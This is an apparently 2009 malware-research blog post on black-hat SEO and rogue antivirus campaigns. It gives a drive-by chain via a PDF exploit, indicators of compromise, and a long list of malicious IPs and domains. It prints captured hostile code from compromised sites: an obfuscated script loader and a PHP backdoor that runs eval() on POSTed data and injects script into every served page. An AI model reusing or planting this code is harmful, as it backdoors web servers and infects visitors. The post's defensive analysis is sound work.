Malware Web Threats: Black Hat SEO and Rogue Antivirus p.5

Friday, April 3, 2009

Black Hat SEO and Rogue Antivirus p.5

The silent threat: Black Hat SEO planting trojans

Full of hacks

READ THIS page if you need more information

Follow this page for desinfection: Malware Manipulating Google SERPs (from blog.scansafe.com)

After promoting some spyware and other rogue security software, now this is another list of compromised websites all with obfuscated javascript code inserted which result in:

hxxp://94.247.2.195/news/?id=100
(Analysis)

which call

hxxp://94.247.2.195/news/?id=2

and download a PDF with a random name QRB.pdf, WXk.pdf ...

File size: 10417 bytes
MD5: af28f3bc9424a3da7ff8bc84740bce93

VirusTotal Analysis: 0/40 (0%)

when running it load

hxxp://94.247.2.195/news/?id=10&

With an Adobe Collab overflow (CVE-2007-5659)
Wepawet Analysis

which lead to an executable beeing downloaded and executed.
Also with a random name PO.exe, 8lv.exe ...

File Size: 15360 Bytes
MD5: 791509d03706cbc8883536b5131341d4

Anubis Report

VirusTotal Analysis: 10/40 (25%)

a-squared - Trojan-Spy.Agent!IK
Avast - Win32.Daonol-L
eSafe - Suspicious File
GData - Win32:KillAV-KS
Irakus - Trojan-Spy.Agent
Kaspersky - Backdoor.Win32.Agent.afhg
McAfee+Artemis - Generic!Artemis
Prevx1 - High Risk Cloaked Malware
Sophos - Mal/Generic-A
TrendMicro - PAK_Generic.001

First received on 04.03.2009 18:36:21 (CET)

Ikarus: Trojan-Spy.Agent (Sig-Id:975847)

ThreatExpert Report
Prevx

Source:

dreamhost.com discussion
dynamicdrive.com forum
windowsbbs.com forum
spywarewarrior.com forum
who-is-who-in-gpt.com
tcheval.net forum (FR)

Also interesting on this IP is this script:

If you have this code in your site, you are probably on of these victims.
Change all your passwords, including FTP, emails etc. On all your accounts.

94.247.2.195/jquery.js
or
78.110.175.249/jquery.js (not responding) in Russia

descr: LIMIT SUREHOST - AAS188-RIPE - @ukservers.com
person: Alexander A Solovyov - @limt.ru
LIMT Group Ltd. has zero web presence, apart from SPAM, hacking and other problems.
They are clearly a bogus company. Clear evidence of criminal fraud. "Same for LIMIT SUREHOST"

route: 78.110.160.0/20 - UK Dedicated Servers Limited - AS42831 - UKSERVERS-MNT

Javascript code:

<script language=javascript>
document.write(unescape('
%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6
1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz
AnczAnrHY8iprLtzAn%3E
').
replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));
</script>

Script found on compromised websites all for the benefit of the
infamous Russian Business Network (RBN).

PHP code injected

<?php
if (!function_exists('tmp_lkojfghx')) {
for ($i = 1; $i < 10; $i++)
if (is_file($f = '/tmp/m' . $i)) {
include_once($f);
break;
}
if (isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if (!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5
ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaX
RlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFM
wcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcm
M2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdW
VyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzB
TMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfE
lpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3Jp
cHQ+'));
function tmp_lkojfghx($s)
{
if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b'))
$s = gzinflate(substr($s, 10, -8));
if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
foreach ($a[0] as $v)
if (count(explode("\n", $v)) > 5) {
$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>]{30,}#', $v)
|| preg_match('#[\(\[](\s*\d+,){20,}#', $v);
if ((preg_match('#\beval\b#', $v) &&
($e || strpos($v, 'fromCharCode'))) ||
($e && strpos($v, 'document.write')))
$s = str_replace($v, '', $s);
}
$s1 = preg_replace('#<script language=javascript>
</script>#', '', $s);
if (stristr($s, '<body'))
$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
$s = $s1 . TMP_XHGFJOKL;
return $g ? gzencode($s) : $s;
}
function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0)
{
$s = array();
if ($b && $GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d);
foreach (@ob_get_status(1) as $v)
if (($a = $v['name']) == 'tmp_lkojfghx')
return;
else
$s[] = array($a == 'default output handler' ? false : $a);
for ($i = count($s) - 1; $i >= 0; $i--) {
$s[$i][1] = ob_get_contents();
ob_end_clean();
}
ob_start('tmp_lkojfghx');
for ($i = 0; $i < count($s); $i++) {
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl'] = $a;
tmp_lkojfghx2();
?>

with colors:

Google search

Malware Web Threat Research

Active attacks: LATEST ADDITIONS

78.129.166.166
Malware drop

my-xtube.com
free-porn-host.com
xmovies-central.com
top-porn-tubes.com
my-fuck-movies.com
youtube-xmovies.com
yourporn-xmovies.com
209.44.126.22
Malware drop: Fake Antivirus

websecuritypolice.com
futureinternetsecurity.com
websecuritybureau.com
techsecurityscan.com
securityexamination.com
webbrowsersecurity.com
onlinebrandsecuritys.com
209.44.126.241
Malware drop: Fake Antivirus

freeforscanpc.com
xvirusdescan.com
trustedwebsecurity.com
allowedwebsurfing.com
truevirusshield.com
greatscansecurity.com
216.240.143.7
Malware drop

better-tube-show.com
hot-tube-area.com
megacooltubes2009.com
91.212.132.11
Malware drop

xmovies-host.com
porn-tube-host.com
91.212.65.54
Malware drop

sdfv-programs.com
91.212.65.55
Malware drop: Fake Antivirus

thesecurityscan.com
91.207.61.37
Malware drop

googleanalytlcs.net
google-analytlcs.com
pornorawa.com
209.44.126.102
Malware drop: Fake Antivirus

star4scan.info
scanfan4.info
scanstar4.info
scanray4.info
scanmix4.info
scanmini4.info
scanatom4.info
209.44.126.102
Malware drop: Fake Antivirus

ray4scan.info
scanmix4.info
206.53.61.74
Malware drop: Fake Antivirus

virussweeperpro.com
update1.virusshieldpro.com
206.53.61.76
Malware drop: Fake Antivirus

virussweeper-scan.net
206.53.61.76
Malware drop: Fake Antivirus

virusshield-scanvirus.net
194.165.4.77
Fraudulent Payment for Rogue AV

securebill09.com/pp/
194.165.4.77
Fraudulent Payment for Rogue AV

winpcdefender09.com
194.165.4.140
Fraudulent Payment for Rogue AV

iantivirus-pro.com
iantiviruspro.com
91.212.65.55
Malware drop: WinWebSecurity

webeyesecurity.com
209.44.126.102
Malware drop: Fake Antivirus

scan4fan.info
fan4scan.info
lux4scan.info
atom4scan.info
scan4mini.info
scan4mix.info
mini4scan.info
scanline6.info
209.44.126.102
Malware drop: Fake Antivirus

scan4star.info
scan4ray.info
scan4atom.info
38.105.19.27
Malware drop: Fake Antivirus

scan6open.com
open6scan.com
scan6fuse.com
fusescan6.com
78.159.115.216
Malware drop: Fake Antivirus

way6scan.com
fuse6scan.com
91.212.65.54
Malware drop

kxc-softwaresportal.com
cls-softwares.com
slk-softwareportal.com2
212.95.58.156
Malware drive-by-download

berusimcom.com
95.129.144.236
Malware drop: Fake Antivirus

winpc-antivirus.com
freewebmypcscan.com
91.212.41.110
Malware drive-by-download

islandtravet.cn
clubmillionswow.cn
litefront.cn
liteauction.cn
melodynew.cn
zyne4ka.com
workfuse.cn
apprecearlyrock.com
91.212.41.96
Malware drive-by-download

goldrushclub.cn
schoolh.cn
designroots.cn
housevisual.cn
rainfinish.cn
bookadorable.cn
91.212.65.55
Malware drop: WinWebSecurity

onlinesecurityhost.com
justwebsecurity.com
globalsecurityscan.com
onlinebrandsecurity.com
internetsafetyexamine.com
youronlinestability.com
78.159.115.215
Malware drop

line4scan.info
scanline4.info
scan4log.info
log4scan.info
logscan4.info
list6scan.com
209.44.126.102
Malware drop: Fake Antivirus

fanscan4.com
starscan4.com
rayscan4.com
mixscan4.com
mixscan4.com
miniscan4.com
209.44.126.102
Malware drop: Fake Antivirus

scan4lux.info
way4scan.info
wayscan4.info
scan4way.info
scanway4.info
main4scan.info
mainscan4.info
scanmain4.info
209.44.126.102
Malware drop: Fake Antivirus

scan4main.info
scan4zoom.info
scan4true.info
scan4user.info
scan4way.info
scantrue4.info

truescan4.info
userscan4.info
wayscan4.info
209.44.126.102
Malware drop: Fake Antivirus

zoomscan4.info
scanmega4.info
scan4mega.info
mega4scan.info
scan4mix.com
scanray4.com
scan4ray.com
ray4scan.com
78.159.115.215
Malware drop: Fake Antivirus

gechscan.info
scangech.info
scangechscan.info
scanscangech.info
freescangech.info
freegechscan.info
gescanch.info
gechscannow.info
78.159.115.215
Malware drop: Fake Antivirus

gescanchnow.info
nowscangech.info
scan4lite.info
scanlite4.info
lite4scan.info
litescan4.info
scan4list.info
scanlist4.info
78.159.115.215
Malware drop: Fake Antivirus

list4scan.info
listscan4.info
lead4scan.info
scan4lead.info
linescan4.info
livescan4.info
scan4line.info
scan4list.info
78.159.115.215
Malware drop

goscanarea.com
goscanelite.com
goscanfile.com
goscanfix.com
goscangoal.com
goscankey.com
goscanmeta.com
goscanmore.com
78.159.115.215
Malware drop

goscannote.com
goscantop.com
goscanwork.com
goareascan.com
goelitescan.com
gofilescan.com
gofixscan.com
gogoalscan.com
78.159.115.215
Malware drop

gokeyscan.com
gometascan.com
gomorescan.com
scanlive4.info
cogech.com
geninch.com
stagech.com
85.17.189.183
IFRAME Attack

firstplumb.info
38.113.1.102
IFRAME Attack

antivirus.vc
209.44.100.58
IFRAME Attack

travelto.uz.ua
209.44.126.241
Malware drop: Fake Antivirus

updateyoursecurity.com
78.129.166.166
Malware drop: Fake Codec

free-xxx-central.com
free-tube-video-central.net
xtube-xmovie.com
porn-tube-movies.com
194.165.4.77
Malware drop

tubeontvgl.com/scan/
tubeontvgl.com/tube/
litetubevideoz.com/scan/
litetubevideoz.com/tube/
loyalvideoz.com/tube/
loyalvideoz.com/scan/
loyal-porno.com/tube/
loyal-porno.com/scan/
194.165.4.77
Malware drop

truepornvideo.com/scan/
truepornvideo.com/tube/
truepornupload.com
videoporntrue.com
64.20.33.156
Malware drop: Fake Antivirus

step6scan.info
stepscan6.info
scanstep6.info
scan6step.info
scan6ray.info
ray6scan.info
fuse6scan.info
fusescan6.info
64.20.33.156
Malware drop: Fake Antivirus

scan6fuse.info
scan6star.info
scanfuse6.info
star6scan.info
195.88.80.41
Malware drop

ded-softportal.com
63.146.2.92
Malware drop

any4scan.info
anyscan4.info
atom4scan.com
atomscan4.com
base4scan.info
basescan4.info
bestscan4.info
bestscan7.com
63.146.2.92
Malware drop

data4scan.info
datascan4.info
easy4scan.info
easyscan4.info
ever4scan.info
everscan4.info
fast4scan.info
fastscan4.info
63.146.2.92
Malware drop

fuse4scan.info
fusescan4.info
goareascan.com
goscanarea.com
gomindscan.com
goscanatom.com
in4st.com
in4tk.com
63.146.2.92
Malware drop

gate4scan.info
gatescan4.info
scan4gate.com
scangate4.info
63.146.2.92
Malware drop

lux4scan.com
luxscan4.com
new7scan.com
newscan4.info
plus4scan.info
plusscan4.info
scan4any.info
scan4atom.com
63.146.2.92
Malware drop

scan4base.info
scan4data.info
scan4easy.info
scan4ever.info
scan4fast.info
scan4fuse.info
scan4list.com
scan4star.com
63.146.2.92
Malware drop

scan7new.com
scanany4.info
scanbase4.info
scanbest4.info
scandata4.info
scaneasy4.info
scanever4.info
scanfast4.info
63.146.2.92
Malware drop

scanfuse4.info
scanmix4.com
scannew4.info
scanplus4.info
scansafe4.info
scanstar4.com
scantool4.info
scanuser4.info
63.146.2.92
Malware drop

home4scan.info
scan4home.info
scanhome4.info
scanzoom4.info
star4scan.com
tool4scan.info
user4scan.info
zoom4scan.info
209.44.126.22
Malware drop: WinWebSecurity

socialsecurityscan.com
thefullvirusscan.com
66.96.252.199
Malware drop: Fake Antivirus

scan4now.info
scannow4.info
now4scan.info
nowscan4.info
scan4tool.info
toolscan4.info
scan4step.info
scanstep4.info
66.96.252.199
Malware drop: Fake Antivirus

scan4safe.info
safescan4.info
scansafe4.info
safe4scan.info
66.96.252.199
Malware drop: Fake Antivirus

gonotescan.com
goscanwork.com
step4scan.info
stepscan4.info
open4scan.info
openscan4.info
scan4open.info
scanopen4.info
69.10.52.11
Malware drop

scan5best.info
scanbest5.info
best5scan.info
bestscan5.info
scan5live.info
live5scan.info
fast5scan.com
66.101.58.54
Malware drop

gotopscan.com
91.207.61.48
Malware drop

wovens.info
216.195.35.99
Drive-by-downloads

seaarch.info/in.cgi?2&group=5
209.44.126.14
Malware drop: Fake Antivirus

allvirusscannow.com
bastvirusscan.com
fullsecurityaction.com
topwinsystemscan.com
totalvirushield.com
totalsystemguard.com
truevirusscan.com
yourpcshield.com
209.44.126.15
NS for malware domain

ns1.ahuliard.com
ns2.ahuliard.com
ns1.moregreatsites.com
ns2.moregreatsites.com
94.247.2.123
Malware drop: Fake Antivirus

avscanonline.com
66.206.17.32
Malware drop

leadscan6.info
listscan6.com
list6scan.info
listscan6.info
litescan6.info
scanlead6.info
scan6list.info
scanlist6.info
66.206.17.32
Malware drop

scan6lead.info
scanlite6.info
scan6line.info
66.206.17.29
Malware drop

in6sd.com
in6iq.com
216.32.83.110
Malware drop

delshiktds.com
gozbest.net
64.92.170.128
Malware drop

myhealtharea.cn
zbesttds.com
64.92.170.129
Malware drop

myhealtharea.net
209.44.126.14
Malware drop: WinWebSecurity

bastvirusscan.com
pcguardscan.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
myfirstsecurityscan.com
systemvirusscan.com
totalvirusdestroyer.com
69.10.52.12
Malware drop

fast5scan.com
gowithscan.com
easy5scan.com
goscanlux.com
live5scan.info
new5scan.info
scan5best.info
69.10.52.12
Malware drop

scan5live.info
scan5new.info
78.159.118.229
Malware drop

gomodescan.com
66.206.17.28
Malware drop

base6scan.info
lead6scan.info
leadscan6.info
justscan6.info
just6scan.info
scanbest6.info
scantrue6.com
stepscan6.com
66.206.17.28
Malware drop

scan6data.info
scan6ever.info
scanever6.info
home6scan.info
scanjust6.info
scan6just.info
goscanlux.com
scandata6.com
66.206.17.28
Malware drop

scandata6.info
scan4data.info
scandata4.info
scanmini6.info
scan6lead.info
scanlead6.info
scan6line.info
scan6list.info
66.206.17.28
Malware drop

base6scan.info
justscan6.info
scan6user.com
scanbest6.info
scantrue6.com
stepscan6.com
step6scan.com
scan6user.com
66.206.17.28
Malware drop

scan6fan.info
scanlist6.info
scanlite6.info
gomixscan.com
goonlyscan.com
209.44.126.29
IFRAME Attack

individualpeople.biz
85.17.189.183
IFRAME Attack

firstplumb.info
88.214.202.224
IFRAME Attack

jafarcompany.biz
211.95.73.189
Malware drop

dlsg09.com
dlsgd3.com
getsgd3.com
getsysgd09.com
gomaldef092.com
gosgd3.com
211.95.73.189
Malware drop

scan.systemcleaner22.com
spywareremover21.com
systemguard2009.com
195.88.81.93
Malware drop

top-scanner-av-4pc.com
scan-anti-spy-av.com
scan-antispyware-4pc.com
msscanner-top-pc.com
msscan-files-antivir.com
msscanner-files-av.com
195.88.81.74
Malware drop

files.scanner-antispy-av-files.com
206.53.61.74
Malware drop

ms-load-top-files.com
virussweeper-scan.com/?p
extraantivir.com
87.248.163.58
IFrame

beebest.cn
stopgam.cn
87.248.163.58
Malware drop

098765.com/in.php
999666999.com/in.php
berrousmark2009.com/in.php
massmarker2009.com/in.php
74.125.45.100
Malware drop

goscanhigh.com
195.88.81.37
Malware drop

pro-scanner-av-pc.com
195.88.81.74
Malware drop

scanner-antispy-av-files.com
66.197.154.199
Malware drop: InternetAntivirusPro

anyscan6.info
atom6scan.info
scan6data.com
gofanscan.com
goscanfan.com
goscanstar.com
goscanmini.com
goscanlite.com
66.197.154.199
Malware drop: InternetAntivirusPro

scan6base.info
gominiscan.com
scanbase6.info
gofanscan.com
scanbest6.com
scan6fast.com
any6scan.com
true6scan.com
66.197.154.199
Malware drop

scan6atom.info
scanany6.info
goscanmix.com
209.44.126.14
Malware drop: Fake Antivirus

anytoplikedsite.com
trustsecurityshield.com
topsecurity4you.com
cleanyourpcspace.com
fullsecurityshield.com
greatsecurityshield.com
topsecurityapp.com
fullandtotalsecurity.com
209.44.126.14
Malware drop: Fake Antivirus

securityscan4you.com
securitytopagent.com
checkonlinesecurity.com
inetsecuritycenter.com
scanprotectiononline.com
todaybestscan.com
greatsecurityshield.com
mytoplikedsite.com
78.159.101.22
Malware drop: Fake Antivirus

tool4scan.info
174.142.113.206
Malware drop

best-click-av1.info
download.best-click-av1.info
195.88.81.12
Malware drop

super-top-scan-pro.com
dl.super-top-scan-pro.com
78.26.179.239
Malware drop

anispy-storage-ms.com
dl.anispy-storage-ms.com
84.16.227.223
Malware drop

theonlinesecurityscan.com
zerocleaner.com
195.88.80.207
Malware drop

int.proreportms1.com
195.88.81.93
Malware drop

msscanner-top-av.com
78.26.179.137
Malware drop

files.load-ms-av-soft.com
78.26.179.239
Malware drop

dl.anispy-storage-ms.com
94.247.2.215
Malware drop: AntivirusPlus

av-plus-support.com
bestexaminedisease.cn
freecoverstore.cn
friskdiseaselive.cn
yourfriskdisease.cn
bestdefenselive.cn
bigprotectionlive.cn
bigcoverlive.cn
94.247.2.215
Malware drop: AntivirusPlus

bestcountedantivirus.com
countedantiviruspro.com
myplusantiviruspro.com
addedantivirusonline.com
ascertaindiseasepro.cn
easyserviceprotection.cn
bestcover4u.cn
94.247.2.215
Malware drop: AntivirusPlus

addedantivirusstore.com
addedantiviruslive.com
realantivirusplus.com
yourguardstore.cn
myplusantiviruslive.com
94.247.3.4
NS for attack websites

ns1.webwedesecurity.com
94.247.3.5
NS for attack websites

ns2.webwedesecurity.com
91.212.65.10
Malware drop (Forum XSS)

free-web-scaners.info
trucount3000.com

Italian IP
User:jecknic
Mail: sdertreqw@mail.ru
194.165.4.77
Malware drop

uploadmoviez.com
winpcdown9.com
winpcdown10.com
winpcdown99.exe
92.38.0.41
Malware drop

winpcdown09.com
72.167.121.94
Attack website

tds.ibestadult.info
64.69.32.220
Malware drop

av-pro-check.com
scan-check-pro.com
ms-antiviral-scan-av.com
91.212.41.111
Attack website

lemmydislikes.com
greenhistory.cn
aabg.yrapyatnica.com
91.212.41.119
Attack website

tixwagoq.cn
91.212.65.7
Attack website

paylayos.cn
67.15.192.26
New ATTACK 06-apr: IFRAME

host02.digitaleffex.net
67.15.192.127
New ATTACK 06-apr: IFRAME

ecom.rarebreedfootwear.com
67.15.192.127
New ATTACK 06-apr: IFRAME

islandtravets.cn/in.cgi?6
67.15.192.127
NS for attack websites

ns1.freednshostway.com
ns2.freednshostway.com
ns3.freednshostway.com
ns4.freednshostway.com
ns5.freednshostway.com
67.15.192.127
NS for attack websites

ns1.basicstechnology.com
ns2.basicstechnology.com
ns3.basicstechnology.com
222.186.9.187
Malware drop rogue av

darksideddl.com
secureserver1.cc
secureserver2.cc
secureserver3.cc
secureserver4.cc
secureserver5.cc

67.215.245.9
Malware drop rogue av

totalmalwareprotection.com
totalvirusprotection.com
83.133.123.166
Malware drop rogue av

setup.xpvirusprotection.com/
setup.xpvirusprotection2009.com
66.197.154.198
Malware drop: WinWebSecurity

lite6scan.com
scanany6.com
datascan6.com
goscandata.com
truescan6.com
anyscan6.com
scan6tool.com
stepscan6.com
94.247.2.74
Zlkon Malware drop

hot-girl-sex-tube.com
ms-antiviruschecker.com
ms-antiviruschecker.com
sex-super-tube-site.com
sysantivirstorage.com
94.247.2.85
Zlkon Malware drop

ms-downloadsav.com
pro-antispy-scan.com
94.247.2.132
Zlkon Malware drop

sysantivir-checker.com
94.247.2.212
Zlkon Malware drop

servicedm.cn
94.247.2.48
Zlkon Malware drop

privatesecuritycenter.com

94.247.2.53
Zlkon Malware drop

sysantivir-checker.com
94.247.2.x
Exploits/LuckySploit

94.247.2.48
94.247.2.50
94.247.2.157
94.247.2.195
94.247.2.x
Zlkon Malware TDSS

94.247.2.95
94.247.2.107
94.247.2.157
LuckySploit

gogo2me.net
78.26.179.131
Malware drop

antiviruschecker-ms.net
best-tube-home.com
cool-sext-tube-site.com
msantivirus-checker.com
nanochecker-av.com
78.26.179.132
Malware drop

scan.avnanocheck.com
78.26.179.240
Malware drop

best-as-tube.com
hot-sex-scanner.com
sex-scanner-pro.com
64.69.32.220
Malware drop

antispywarecheck2009.com
antispywarecheck-2009.com
antispywarechecker-2009.com
av-pro-check.com
best-sex-scanner.com
hot-tube-ass.com
64.69.42.139
Malware drop

antispywarechecker2009.com
hot-tube-super-sex.com
ms-checker-best-av.com
64.69.32.228
Malware drop

sysantivirchecker.com
94.247.2.215
Malware drop: AntivirusPlus

bigdefense2u.cn
myascertainpoison.cn
easyaddedantivirus.com
easyincomeprotection.cn
easydefenseonline.cn
examineillnesslive.cn
yourguardpro.cn
yourcountedantivirus.com
94.247.2.215
Malware drop: AntivirusPlus

addedantiviruspro.com
bestfriskviruslive.cn
94.247.2.215
Malware drop: Antivirus2010

easyaddedantivirus.com
easypersonalprotection.cn
freedefenseforyou.cn
mycheckdiseasepro.cn
mycheckdiseasestore.cn
mydefense4u.cn
mydefense4you.cn
myguardforyou.cn
213.163.65.10
Malware drop: AntivirusPlus

iloveyourbrain.com
94.247.2.215
NS for Malware domain

ns1.pubilcnameserver7.com
94.247.2.216
NS for Malware domain

ns2.pubilcnameserver7.com
209.44.126.15
NS for Malware domain

ns1.fuckmoneycash.com
209.44.126.16
NS for Malware domain

ns2.fuckmoneycash.com
94.247.3.40
Malware drop: Antivirus2009

antivirusonlineproscanner.com
fastantimalwarescan.com
94.247.3.40
Malware drop

whereismat.cn
falloutneferwin.cn
tabletpccomputing.cn
whreismyplugnplay.cn
fastantimalwarescan.com
94.247.2.84
Malware drop

files.msas2009dl.com
94.247.2.215
Malware drop: Antivirus2010

newguard4u.cn
newguard4you.cn
refugepro.cn
yourguard4you.cn
myourguardforyou.cn
yourguardonline.cn
yourguardpro.cn
209.44.126.14
Malware drop: WinWebSecurity

mytopvirusscan.com
thegreatsecurity.com
topsoftscanner.com
upyoursecurity.com
213.163.65.10
Malware drop: Fake Codec

tubeloyaln.com
66.197.154.198
Malware drop: WinWebSecurity

litescan6.com
scan6main.com
scan6safe.com
userscan6.com
scan6zoom.com
megascan6.com
nowscan6.com
scan6plus.info
66.197.154.198
Malware drop: WinWebSecurity

goscanside.com
scan6zoom.com
megascan6.com
nowscan6.com
scan6plus.info
78.159.101.27
Malware drop: WinWebSecurity

gohighscan.com
goscanplan.com
78.159.101.27
Malware drop: AntivirusPlus

best4scan.info
new4scan.info
pro4scan.info
scan4live.info
scan4pro.info
goscanlist.com
goscanplan.com
78.159.101.37
Malware drop: WinWebSecurity

fusescan4.com
openscan4.com
scanslot4.com
78.159.101.14
Malware drop: WinWebSecurity

fuse4scan.com
scanfuse4.com
scanlist4.com
scanopen4.com
wayscan4.com
78.159.101.27
Malware drop: WinWebSecurity

scan4plus.info
gofullscan.com
list4scan.com
scan4true.com
scan4open.com
in4iz.com
in4co.com
in4ik.com
78.159.101.27
Malware drop: WinWebSecurity

any4scan.com
scan4way.com
78.159.101.43
Malware drop: WinWebSecurity

slotscan4.com
78.159.101.44
Malware drop: WinWebSecurity

scanstep4.com
78.159.101.55
Malware drop: WinWebSecurity

scan4data.com
78.159.101.66
Malware drop: WinWebSecurity

scan4fuse.com
scan4lite.com
gotimescan.com
slot4scan.com
69.10.52.12
Malware drop: WinWebSecurity

plus5scan.com
in5ck.com
plusscan5.com
5scanav.com
scan5plus.com
scan5av.com
goscantip.com
69.10.52.12
Malware drop: InternetAntivirusPro

bestscan5.com
in5is.com
in5sk.com
in5ik.com
66.197.154.197
Malware drop: WinWebSecurity

unionshells.net
66.197.154.198
Malware drop: WinWebSecurity

gohardscan.com
goportscan.com
goscanhard.com
goscanmind.com
goscanport.com
goscanquick.com
in4ik.com
scan6mega.com
66.197.154.198
Malware drop: WinWebSecurity

golitescan.com
logscan6.com
home6scan.com
mainscan6.com
goscanplan.com
goscantime.com
66.197.154.199
Malware drop: InternetAntivirusPro

gotipscan.com
scanlite6.com
scan6step.com
scan6log.info
log6scan.info
mainscan6.info
gen6in.com
gen6iz.com
66.197.154.199
Malware drop: InternetAntivirusPro

scan6lite.com
scanlive6.info
linescan6.info
scanstep6.com
in6st.com
in6iz.com
in6ck.com
in6sk.com
66.197.154.xxx
Malware drop: InternetAntivirusPro

66.197.154.197
66.197.154.198
66.197.154.199
66.197.154.200
66.197.154.201
72.232.186.18
Malware site: WinWebSecurity

systemsecurityline.com
212.95.63.237
Redirectors

netservice1.net
netservice2.net
78.26.179.34
Malware drop: Privacy components

tube-funs-world.com
78.26.179.28
Malware drop: Fake Codec

adult-tube-downloads.net
209.44.126.14
Malware drop: WinWebSecurity

bestfiresfull.com
fuckmoneycash.com
getpcguard.com
getscanonline.com
mostpopularscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
209.44.126.14
Malware drop: WinWebSecurity

runpcscannow.com
scanalertspage.com
scanvistanow.net
yourstabilitysystem.com
vistastabilitynow.com
vistastabilitynow.net
209.44.126.16
Malware drop: WinWebSecurity

systemsecurityonline.com
systemsecuritytool.com
209.44.126.22
Malware drop: WinWebSecurity

onlinestabilityguide.com
onlinestabilityworld.com
protectionskim.com
onlinesafetyscansite.com
safetyscansite.com
securityscansite.com
stabilityaudit.com
wwwsafeexamine.com
205.252.24.226
Malware drop: AntiSpware Pro 2009

antispywarepro.net
netspywarescan.com
online-spyware-scan.net
scanspywareonline.net
94.247.2.215
Malware drop: Antivirus2010

antivirus-plus-new.com
antivirusplussite.com
bestinternetexamine.com
bestnetcheckonline.com
bestwebexamine.com
downloadantivirusplus.com
easynetcheckonline.com
easywebchecklive.com
94.247.2.215
Malware drop: Antivirus2010

addedantiviruslive.com
easywebexamine.com
easywebscanlive.com
internethomecheck.com
linkcanlive.com
linkcanpro.com
myantivirusplus.com
94.247.2.215
Malware drop: Antivirus2010

rapldhsare.com
safeyouthnet.com
security-check-center.com
securesoftinternet.com
theantivirusplus.com
websecurecheck.com
websmartcheck.com

94.247.2.215
Malware drop: Antivirus2010

myinternetexamine.com
onlinescanweb.com

94.247.2.215
Malware drop: Antivirus2010

yourinternetexamine.com
yournetascertain.com
yournetcheckonline.com
yournetcheckonline.com
yourwebexamine.com
yourwebscanlive.com
94.247.2.215
Malware drop: AntivirusPlus

linkcanonline.com
yournetascertain.com
94.247.3.3
Malware drop: WinWebSecurity

theonlinesecurity.com
greatonlinesecurityscan.com
webwidesecurity.com
beststabilityscans.com
greatvirusscan.com
internetsafetyskim.com
networkstabilitytrace.com
94.247.3.3
Malware drop: WinWebSecurity

protectionexamine.com
stabilityinetscan.com
webprotectionscan.com
wwwsecurityread.com
94.247.3.74
Malware drop: WinWebSecurity

securityexamine.com
wwwsafetyread.com
securityexamine.com
webnetsafety.com
webprotectionreads.com
websafetynetscan.com
webstabilityscan.com
wwwsafetyscan.com
94.247.2.42
Fraudulent payment system

sales.getpaymentform.com:443
64.191.12.38
Malware drop: MS Antispyware 2009

addantivirus.com
antispyme.com
antispylinks.com
antispylist.com
antiviruscheckout.com
pro-antispyware2009.com
64.191.12.38
Malware drop

syscleanerpro.com
systemcleanerpro.com
system-cleanerpro.com
totalantispyware.com
totalantispyware2009.com
totalantispyware.net
78.129.166.225
Malware drop: WinWebSecurity

wwwprotectionread.com
thestabilityinternet.com
wwwskimonline.com
194.165.4.41
Malware drop+ns: WinWebSecurity

best6scan.com
bestscan6.com
ns1.avscan1.com
newscan4.com
newscan6.com
scan4easy.com
scanbest4.com
194.165.4.140
Malware drop: GeneralAntivirus

goscanlead.com
goscanbase.com
easy6scan.com
general-antivirus.com
generalantivirus.com
goopenscan.com
goscantrue.com
209.85.171.83
Malware drop: WinWebSecurity

lite4scan.com
209.249.222.48
Malware drop: Malware Defender 2009

antiviralscanner14.com
easywinscanner17.com
malwarescanner20.com
protectprivacy18.com
systemscanner19.com
sg9scanner.com
sg10scanner.com
sg11scanner.com
209.160.20.117
Malware drop

antivirus-pro-live-scan.com
84.243.252.160
Redirector

evenmorestats.com
94.102.51.14
Malware drop

securecleanersolution.com
85.17.254.158
Malware drop

promotion-offer.com
94.102.51.14
Malware drop

removespywarethreats.com
84.16.227.222
Malware drop

bestcleaner.us
ultracleaner.biz
91.212.65.29
Malware drive-by-download

free-web-scaners.net
free-web-scaners.biz
free-web-scaners.com

Virus/Malware Analyzer

Scan a malicious file:

ThreatExpert
VirusTotal

Report a malicious domain:

Malware Domain List
hpHosts
Google

Analyzing a suspicious file/URL:

Wepawet Iseclab (JS/Flash/PDF)
Jsunpack (JS/Flash/PDF)
Anubis Iseclab (Executable)

Malware Web Threats

Friday, April 3, 2009

Black Hat SEO and Rogue Antivirus p.5

Malware Web Threats Headline

Malware Web Threats

Malware Web Threat Research

Malware Web Based Threats Headline Animator

Blog Archive